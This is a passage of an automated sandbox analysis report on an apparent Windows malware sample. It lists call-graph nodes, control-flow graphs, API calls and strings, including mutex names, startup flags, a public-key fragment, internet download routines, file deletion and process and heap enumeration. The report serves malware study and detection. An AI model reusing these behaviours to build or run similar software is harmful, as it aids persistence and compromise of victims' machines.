43937->43994 43939 41ecaa lstrlenA 43939->43949 43941 413ff0 59 API calls 43940->43941 43943 41ef3a 43941->43943 43942 423a38 __fcloseall 83 API calls 43942->43949 43944 412900 60 API calls 43943->43944 43946 41ef45 lstrcpyW 43944->43946 43945 41ed1f lstrcpyW 43947 41ed43 lstrlenA 43945->43947 43945->43949 43951 41ef6a 43946->43951 43950 420c62 _malloc 58 API calls 43947->43950 43949->43901 43949->43902 43949->43903 43949->43906 43949->43907 43949->43910 43949->43912 43949->43913 43949->43915 43949->43917 43949->43918 43949->43921 43949->43922 43949->43924 43949->43926 43949->43927 43949->43930 43949->43932 43949->43934 43949->43937 43949->43939 43949->43942 43949->43945 43949->43947 43955 41ed68 MultiByteToWideChar lstrcpyW lstrlenW 43949->43955 43958 41edc3 SHGetFolderPathA 43949->43958 43971 40c500 SHGetFolderPathA 43949->43971 44008 420bed 58 API calls 2 library calls 43949->44008 43950->43949 43952 413ff0 59 API calls 43951->43952 43953 41ef9f 43952->43953 43954 412900 60 API calls 43953->43954 43956 41efac lstrcpyW 43954->43956 43955->43949 43957 41edad lstrlenW 43955->43957 43964 41efc8 43956->43964 43957->43949 43960 41ee44 43957->43960 43958->43949 43961 41edea PathAppendA DeleteFileA 43958->43961 43961->43949 43964->43960 43967 40c734 43966->43967 43968 40c6cc RegQueryValueExW 43966->43968 43967->43949 43969 40c70c RegSetValueExW RegCloseKey 43968->43969 43970 40c6fd RegCloseKey 43968->43970 43969->43967 43970->43949 43972 40c525 43971->43972 43973 40c52c PathAppendA 43971->43973 43972->43949 43974 4220b6 125 API calls 43973->43974 43975 40c550 43974->43975 43976 40c559 43975->43976 44011 42387f 85 API calls 5 library calls 43975->44011 43976->43949 43978 40c56c 44012 423455 69 API calls 4 library calls 43978->44012 43980 40c572 44013 420cf4 84 API calls 6 library calls 43980->44013 43982 40c57a 43983 40c5a5 43982->43983 43985 40c589 43982->43985 43984 423a38 __fcloseall 83 API calls 43983->43984 43986 40c5ab 43984->43986 44014 4222f5 74 API calls __fread_nolock 43985->44014 43986->43949 43988 40c593 43989 423a38 __fcloseall 83 API calls 43988->43989 43990 40c599 43989->43990 43990->43949 44015 421ff2 43991->44015 43993 4220c6 43993->43949 43995 422b0e __ioinit 43994->43995 43996 422b44 43995->43996 43997 422b2c 43995->43997 44000 422b3c __ioinit 43995->44000 43998 420e53 __lock_file 59 API calls 43996->43998 43999 425208 _vscan_fn 58 API calls 43997->43999 44001 422b4a 43998->44001 44002 422b31 43999->44002 44000->43949 44109 4229a9 78 API calls 6 library calls 44001->44109 44108 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44002->44108 44005 422b5e 44110 422b7c LeaveCriticalSection LeaveCriticalSection _ungetc 44005->44110 44007->43921 44008->43921 44009->43921 44010->43921 44011->43978 44012->43980 44013->43982 44014->43988 44018 421ffe __ioinit 44015->44018 44016 422010 44017 425208 _vscan_fn 58 API calls 44016->44017 44019 422015 44017->44019 44018->44016 44020 42203d 44018->44020 44051 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44019->44051 44022 428df4 __getstream 61 API calls 44020->44022 44023 422042 44022->44023 44024 42204b 44023->44024 44025 422058 44023->44025 44026 425208 _vscan_fn 58 API calls 44024->44026 44027 422081 44025->44027 44028 422061 44025->44028 44029 422020 __ioinit @_EH4_CallFilterFunc@8 44026->44029 44034 42b078 44027->44034 44030 425208 _vscan_fn 58 API calls 44028->44030 44029->43993 44030->44029 44042 42b095 44034->44042 44035 42b0a9 44036 425208 _vscan_fn 58 API calls 44035->44036 44037 42b0ae 44036->44037 44056 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44037->44056 44039 42b2ac 44053 43fba6 44039->44053 44040 42208c 44052 4220ae LeaveCriticalSection LeaveCriticalSection _ungetc 44040->44052 44042->44035 44050 42b250 44042->44050 44057 43fbc4 58 API calls __mbsnbcmp_l 44042->44057 44044 42b216 44044->44035 44058 43fcf3 65 API calls __mbsnbicmp_l 44044->44058 44046 42b249 44046->44050 44059 43fcf3 65 API calls __mbsnbicmp_l 44046->44059 44048 42b268 44048->44050 44060 43fcf3 65 API calls __mbsnbicmp_l 44048->44060 44050->44035 44050->44039 44051->44029 44052->44029 44061 43fa8f 44053->44061 44055 43fbbf 44055->44040 44056->44040 44057->44044 44058->44046 44059->44048 44060->44050 44063 43fa9b __ioinit 44061->44063 44062 43fab1 44064 425208 _vscan_fn 58 API calls 44062->44064 44063->44062 44065 43fae7 44063->44065 44066 43fab6 44064->44066 44072 43fb58 44065->44072 44079 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44066->44079 44071 43fac0 __ioinit 44071->44055 44081 427970 44072->44081 44074 43fb03 44080 43fb2c LeaveCriticalSection __unlock_fhandle 44074->44080 44076 43bac1 __wsopen_nolock 109 API calls 44077 43fb92 44076->44077 44102 420bed 58 API calls 2 library calls 44077->44102 44079->44071 44080->44071 44082 427993 44081->44082 44083 42797d 44081->44083 44082->44083 44085 42799a ___crtIsPackagedApp 44082->44085 44084 425208 _vscan_fn 58 API calls 44083->44084 44086 427982 44084->44086 44088 4279a3 AreFileApisANSI 44085->44088 44089 4279b0 MultiByteToWideChar 44085->44089 44103 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44086->44103 44088->44089 44090 4279ad 44088->44090 44091 4279ca GetLastError 44089->44091 44092 4279db 44089->44092 44090->44089 44104 4251e7 58 API calls 3 library calls 44091->44104 44105 428cde 58 API calls 2 library calls 44092->44105 44095 4279e3 44096 42798c 44095->44096 44097 4279ea MultiByteToWideChar 44095->44097 44096->44074 44096->44076 44097->44096 44098 427a00 GetLastError 44097->44098 44106 4251e7 58 API calls 3 library calls 44098->44106 44100 427a0c 44107 420bed 58 API calls 2 library calls 44100->44107 44102->44074 44103->44096 44104->44096 44105->44095 44106->44100 44107->44096 44108->44000 44109->44005 44110->44000 44111 481920 44112 42f7c0 __ftell_nolock 44111->44112 44113 481943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 44112->44113 44114 481a0b 44113->44114 44115 4819e2 GetProcAddress GetProcAddress 44113->44115 44116 481aab 44114->44116 44119 481a1b NetStatisticsGet 44114->44119 44115->44114 44117 481acb 44116->44117 44118 481ac4 FreeLibrary 44116->44118 44120 481ad5 GetProcAddress GetProcAddress GetProcAddress 44117->44120 44146 481b0d __ftell_nolock 44117->44146 44118->44117 44121 481a69 NetStatisticsGet 44119->44121 44122 481a33 __ftell_nolock 44119->44122 44120->44146 44121->44116 44123 481a87 __ftell_nolock 44121->44123 44127 45d550 101 API calls 44122->44127 44129 45d550 101 API calls 44123->44129 44124 481bee 44125 481c1b 44124->44125 44126 481c14 FreeLibrary 44124->44126 44130 481c31 LoadLibraryA 44125->44130 44131 481c24 44125->44131 44126->44125 44128 481a5a 44127->44128 44128->44121 44129->44116 44132 481c4a GetProcAddress GetProcAddress GetProcAddress 44130->44132 44133 481d4b 44130->44133 44211 4549a0 13 API calls 4 library calls 44131->44211 44144 481c84 __ftell_nolock 44132->44144 44150 481cac __ftell_nolock 44132->44150 44135 481d59 12 API calls 44133->44135 44136 48223f 44133->44136 44138 481e5c 44135->44138 44139 482233 FreeLibrary 44135->44139 44199 482470 44136->44199 44137 481c29 44137->44130 44137->44133 44138->44139 44160 481ed9 CreateToolhelp32Snapshot 44138->44160 44139->44136 44142 481d3f FreeLibrary 44142->44133 44143 48225b __ftell_nolock 44145 45d550 101 API calls 44143->44145 44147 45d550 101 API calls 44144->44147 44149 482276 GetCurrentProcessId 44145->44149 44146->44124 44152 45d550 101 API calls 44146->44152 44156 481b7c __ftell_nolock 44146->44156 44147->44150 44148 481d03 __ftell_nolock 44148->44142 44153 45d550 101 API calls 44148->44153 44151 48228f __ftell_nolock 44149->44151 44150->44148 44155 45d550 101 API calls 44150->44155 44157 45d550 101 API calls 44151->44157 44152->44156 44154 481d3c 44153->44154 44154->44142 44155->44148 44156->44124 44158 45d550 101 API calls 44156->44158 44159 4822aa 44157->44159 44158->44124 44161 42a77e _ValidateLocalCookies 6 API calls 44159->44161 44160->44139 44162 481ef0 44160->44162 44163 4822ca 44161->44163 44164 481f03 GetTickCount 44162->44164 44165 481f15 Heap32ListFirst 44162->44165 44164->44165 44166 482081 44165->44166 44171 481f28 __ftell_nolock 44165->44171 44167 48209d Process32First 44166->44167 44168 482095 GetTickCount 44166->44168 44169 48210a 44167->44169 44173 4820b4 __ftell_nolock 44167->44173 44168->44167 44170 482118 GetTickCount 44169->44170 44179 482120 __ftell_nolock 44169->44179 44170->44179 44171->44166 44178 48204e Heap32ListNext 44171->44178 44180 482066 GetTickCount 44171->44180 44183 45d550 101 API calls 44171->44183 44189 481ff1 GetTickCount 44171->44189 44193 45d550 44171->44193 44173->44169 44175 45d550 101 API calls 44173->44175 44184 4820fb GetTickCount 44173->44184 44174 481f56 Heap32First 44174->44171 44175->44173 44176 482196 44177 4821a4 GetTickCount 44176->44177 44190 4821ac __ftell_nolock 44176->44190 44177->44190 44178->44166 44178->44171 44179->44176 44182 45d550 101 API calls 44179->44182 44191 482187 GetTickCount 44179->44191 44180->44166 44180->44171 44181 482219 44186 482229 44181->44186 44187 48222d CloseHandle 44181->44187 44182->44179 44185 481fd9 Heap32Next 44183->44185 44184->44169 44184->44173 44185->44171 44186->44139 44187->44139 44188 45d550 101 API calls 44188->44190 44189->44171 44190->44181 44190->44188 44192 48220a GetTickCount 44190->44192 44191->44176 44191->44179 44192->44181 44192->44190 44194 45d559 44193->44194 44196 45d57d __ftell_nolock 44193->44196 44212 46b5d0 101 API calls __except_handler4 44194->44212 44196->44174 44197 45d55f 44197->44196 44213 45a5e0 101 API calls __except_handler4 44197->44213 44200 48247a __ftell_nolock 44199->44200 44201 4824c3 GetTickCount 44200->44201 44202 482483 QueryPerformanceCounter 44200->44202 44203 4824d6 __ftell_nolock 44201->44203 44204 482499 __ftell_nolock 44202->44204 44205 482492 44202->44205 44206 45d550 101 API calls 44203->44206 44207 45d550 101 API calls 44204->44207 44205->44201 44208 4824ea 44206->44208 44209 4824b7 44207->44209 44210 482244 GlobalMemoryStatus 44208->44210 44209->44201 44209->44210 44210->44143 44211->44137 44212->44197 44213->44196

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00419F90 Relevance: 178.3, APIs: 65, Strings: 36, Instructions: 1565COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                                                                                                          • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                                                                                                          • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                                                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,005AADC0,?), ref: 0041A0BB
                                                                                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                                                                                                                                                          • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                                                                                                          • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                                                                                                          • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrK$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                                                                                                                                                        • API String ID: 2957410896-240588167
                                                                                                                                                                                                                                        • Opcode ID: 5383d5bfc50a1b78f694545ad05dceb41a52e664a6808312bd746b750ea4aaca
                                                                                                                                                                                                                                        • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5383d5bfc50a1b78f694545ad05dceb41a52e664a6808312bd746b750ea4aaca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00481920 Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587libraryloadermemoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 606 481920-4819e0 call 42f7c0 GetVersionExA LoadLibraryA * 3 609 481a0b-481a0d 606->609 610 4819e2-481a05 GetProcAddress * 2 606->610 611 481aba-481ac2 609->611 612 481a13-481a15 609->612 610->609 613 481acb-481ad3 611->613 614 481ac4-481ac5 FreeLibrary 611->614 612->611 615 481a1b-481a31 NetStatisticsGet 612->615 616 481b0d 613->616 617 481ad5-481b0b GetProcAddress * 3 613->617 614->613 618 481a69-481a85 NetStatisticsGet 615->618 619 481a33-481a5d call 42f7c0 call 45d550 615->619 621 481b0f-481b17 616->621 617->621 618->611 620 481a87-481aae call 42f7c0 call 45d550 618->620 619->618 620->611 625 481c0a-481c12 621->625 626 481b1d-481b23 621->626 629 481c1b-481c22 625->629 630 481c14-481c15 FreeLibrary 625->630 626->625 627 481b29-481b2b 626->627 627->625 633 481b31-481b47 627->633 635 481c31-481c44 LoadLibraryA 629->635 636 481c24-481c2b call 4549a0 629->636 630->629 650 481b98-481baa 633->650 651 481b49-481b5d 633->651 637 481c4a-481c82 GetProcAddress * 3 635->637 638 481d4b-481d53 635->638 636->635 636->638 645 481caf-481cb7 637->645 646 481c84 637->646 641 481d59-481e56 GetProcAddress * 12 638->641 642 48223f-482256 call 482470 GlobalMemoryStatus call 42f7c0 638->642 647 481e5c-481e63 641->647 648 482233-482239 FreeLibrary 641->648 669 48225b-4822cd call 45d550 GetCurrentProcessId call 42f7c0 call 45d550 call 42a77e 642->669 652 481cb9-481cc0 645->652 653 481d06-481d08 645->653 656 481c86-481cac call 42f7c0 call 45d550 646->656 647->648 654 481e69-481e70 647->654 648->642 661 481bb2-481bb4 650->661 670 481b8a-481b8c 651->670 671 481b5f-481b84 call 42f7c0 call 45d550 651->671 659 481ccb-481ccd 652->659 660 481cc2-481cc9 652->660 657 481d0a-481d3c call 42f7c0 call 45d550 653->657 658 481d3f-481d45 FreeLibrary 653->658 654->648 662 481e76-481e7d 654->662 656->645 657->658 658->638 659->653 666 481ccf-481cde 659->666 660->653 660->659 661->625 667 481bb6-481bca 661->667 662->648 668 481e83-481e8a 662->668 666->653 680 481ce0-481d03 call 42f7c0 call 45d550 666->680 688 481bfc-481bfe 667->688 689 481bcc-481bf6 call 42f7c0 call 45d550 667->689 668->648 675 481e90-481e97 668->675 670->650 671->670 675->648 682 481e9d-481ea4 675->682 680->653 682->648 690 481eaa-481eb1 682->690 688->625 689->688 690->648 696 481eb7-481ebe 690->696 696->648 702 481ec4-481ecb 696->702 702->648 706 481ed1-481ed3 702->706 706->648 709 481ed9-481eea CreateToolhelp32Snapshot 706->709 709->648 711 481ef0-481f01 709->711 713 481f03-481f0f GetTickCount 711->713 714 481f15-481f22 Heap32ListFirst 711->714 713->714 715 481f28-481f2d 714->715 716 482081-482093 714->716 717 481f33-481f9d call 42f7c0 call 45d550 Heap32First 715->717 718 48209d-4820b2 Process32First 716->718 719 482095-482097 GetTickCount 716->719 734 481f9f-481faa 717->734 735 482015-482060 Heap32ListNext 717->735 721 48210a-482116 718->721 722 4820b4-4820f5 call 42f7c0 call 45d550 718->722 719->718 723 482118-48211a GetTickCount 721->723 724 482120-482135 721->724 722->721 751 4820f7-4820f9 722->751 723->724 732 482196-4821a2 724->732 733 482137 724->733 737 4821ac-4821c1 732->737 738 4821a4-4821a6 GetTickCount 732->738 740 482140-482181 call 42f7c0 call 45d550 733->740 741 481fb0-481feb call 42f7c0 call 45d550 Heap32Next 734->741 735->716 742 482062-482064 735->742 752 482219-482227 737->752 753 4821c3-482204 call 42f7c0 call 45d550 737->753 738->737 740->732 771 482183-482185 740->771 763 481fed-481fef 741->763 764 48200f 741->764 746 482079-48207b 742->746 747 482066-482077 GetTickCount 742->747 746->716 746->717 747->716 747->746 751->722 756 4820fb-482108 GetTickCount 751->756 760 482229-48222b 752->760 761 48222d CloseHandle 752->761 753->752 774 482206-482208 753->774 756->721 756->722 760->648 761->648 768 481ff1-482002 GetTickCount 763->768 769 482004-48200d 763->769 764->735 768->764 768->769 769->741 769->764 771->740 772 482187-482194 GetTickCount 771->772 772->732 772->740 774->753 775 48220a-482217 GetTickCount 774->775 775->752 775->753
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00481983
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                                                                                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00481A2D
                                                                                                                                                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00481A81
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00481AC5
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00481C15
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00481D45
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00481EDD
                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00481F03
                                                                                                                                                                                                                                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00481F1A
                                                                                                                                                                                                                                        • Heap32First.KERNEL32(00000024,?,?), ref: 00481F95
                                                                                                                                                                                                                                        • Heap32Next.KERNEL32(?,?,?,?,?,B957BB2E), ref: 00481FE3
                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00481FF1
                                                                                                                                                                                                                                        • Heap32ListNext.KERNEL32(?,?), ref: 00482058
                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00482066
                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00482095
                                                                                                                                                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 004820AA
                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004820FB
                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00482118
                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00482187
                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004821A4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                                                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                                                                                                        • API String ID: 4174345323-1723836103
                                                                                                                                                                                                                                        • Opcode ID: fea07ce2f0117be6352bc301b8b84ac92ab27d7aecf4f5d53a5a37b6a16b1baf
                                                                                                                                                                                                                                        • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fea07ce2f0117be6352bc301b8b84ac92ab27d7aecf4f5d53a5a37b6a16b1baf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 776 41e690-41e6d8 call 42f7c0 timeGetTime call 423f74 call 40c6a0 783 41e6e0-41e6e6 776->783 784 41e6f0-41e722 call 42b420 call 40c500 783->784 789 41e724-41e729 784->789 790 41e72e-41e772 InternetOpenW 784->790 793 41ea1f-41ea40 call 423cf0 789->793 791 41e774-41e776 790->791 792 41e778-41e77d 790->792 794 41e78f-41e7b8 call 415ae0 call 421c02 791->794 795 41e780-41e789 792->795 800 41ea42-41ea46 793->800 801 41ea8d-41eacc lstrlenA lstrcpyA * 2 lstrlenA 793->801 816 41e882-41e8e5 call 415ae0 call 413ff0 call 412900 call 4159d0 794->816 817 41e7be-41e7f7 call 414690 call 40dd40 794->817 795->795 797 41e78b-41e78d 795->797 797->794 803 41ee2a-41ee3a call 411b10 800->803 804 41ea4c-41ea61 SHGetFolderPathA 800->804 805 41eaef-41eb12 801->805 806 41eace 801->806 824 41ee4d-41ee82 call 40ef50 803->824 825 41ee3c-41ee3f 803->825 804->784 808 41ea67-41ea88 PathAppendA DeleteFileA 804->808 812 41eb14-41eb16 805->812 813 41eb18-41eb1f 805->813 809 41ead0-41ead8 806->809 808->784 814 41eaeb 809->814 815 41eada-41eae7 lstrlenA 809->815 819 41eb2b-41eb4f call 4156d0 call 412900 812->819 820 41eb22-41eb27 813->820 814->805 815->809 822 41eae9 815->822 873 41e8f3-41e917 lstrcpyW 816->873 874 41e8e7-41e8f0 call 422587 816->874 845 41e7f9-41e7fe 817->845 846 41e86f-41e874 817->846 843 41eb51 819->843 844 41eb53-41eb66 lstrcpyW 819->844 820->820 827 41eb29 820->827 822->805 836 41ee86-41ee8c 824->836 825->783 827->819 840 41ee92-41ee94 836->840 841 41ee8e-41ee90 836->841 851 41ee97-41ee9c 840->851 849 41eea0-41eeaf call 413ea0 841->849 843->844 852 41eb74-41ebe4 lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW call 423cf0 844->852 853 41eb68-41eb71 call 422587 844->853 847 41e800-41e809 call 422587 845->847 848 41e80c-41e827 845->848 846->816 854 41e876-41e87f call 422587 846->854 847->848 856 41e842-41e848 848->856 857 41e829-41e82d 848->857 849->836 875 41eeb1-41eee3 call 40ef50 849->875 851->851 859 41ee9e 851->859 896 41ebe6-41ebea 852->896 897 41ec3d-41ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 852->897 853->852 854->816 866 41e84e-41e86c 856->866 865 41e82f-41e840 call 4205a0 857->865 857->866 859->849 865->866 866->846 879 41e943-41e97a InternetOpenUrlW InternetReadFile 873->879 880 41e919-41e920 873->880 874->873 895 41eee7-41eeed 875->895 883 41e9ec-41ea08 InternetCloseHandle * 2 879->883 884 41e97c-41e994 SHGetFolderPathA 879->884 880->879 886 41e922-41e92e 880->886 891 41ea16-41ea19 883->891 892 41ea0a-41ea13 call 422587 883->892 884->883 890 41e996-41e9c2 PathAppendA call 4220b6 884->890 893 41e930-41e935 886->893 894 41e937 886->894 890->883 913 41e9c4-41e9e4 lstrlenA call 422b02 call 423a38 890->913 891->793 892->891 900 41e93c-41e93d lstrcatW 893->900 894->900 901 41eef3-41eef5 895->901 902 41eeef-41eef1 895->902 896->803 904 41ebf0-41ec11 SHGetFolderPathA 896->904 906 41ec99 897->906 907 41ecbf-41ecdd 897->907 900->879 903 41eef8-41eefd 901->903 909 41ef01-41ef10 call 413ea0 902->909 903->903 910 41eeff 903->910 904->784 911 41ec17-41ec38 PathAppendA DeleteFileA 